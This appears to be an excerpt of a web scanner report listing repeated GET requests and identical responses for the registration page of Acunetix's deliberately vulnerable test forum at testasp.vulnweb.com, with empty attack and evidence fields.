HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
